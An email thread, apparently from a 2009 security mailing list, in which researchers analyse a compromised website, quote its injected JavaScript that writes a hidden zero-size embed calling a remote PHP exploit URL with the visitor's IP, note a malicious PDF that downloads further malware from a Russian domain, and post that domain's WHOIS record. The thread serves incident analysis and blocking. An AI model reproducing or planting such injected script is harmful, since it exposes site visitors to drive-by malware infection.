Paul, I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it.
Jake, WHOIS information on the domain:

Whois Record
domain: TEST1.RU
type: CORPORATE
nserver: ns1.centerhost.ru.
nserver: ns1.cetis.ru.
state: REGISTERED, DELEGATED
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data
Created: 2001-03-30
Expires: 2010-04-03
Whois Server: whois.ripn.net

Server Data
Domain Status: Registered And No Website

On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("<embed
>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> <embed src="include/two.pdf" width="1" height="0"
>> style="border:none"></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
>
> Not only is that .pdf malicious, when "executed" it also fetches additional
> malware from:
>
> hxxp:// test1.ru /1.1.1/load.php
>
> If that host is not in your block list, it should be -- known purveyor of
> crimeware.
>
> This is in addition to the other malicious URLs mentioned in this thread.
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
> mxM8Ci/feKnJe6M6qbiESPw=
> =b0Yj
> -----END PGP SIGNATURE-----
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/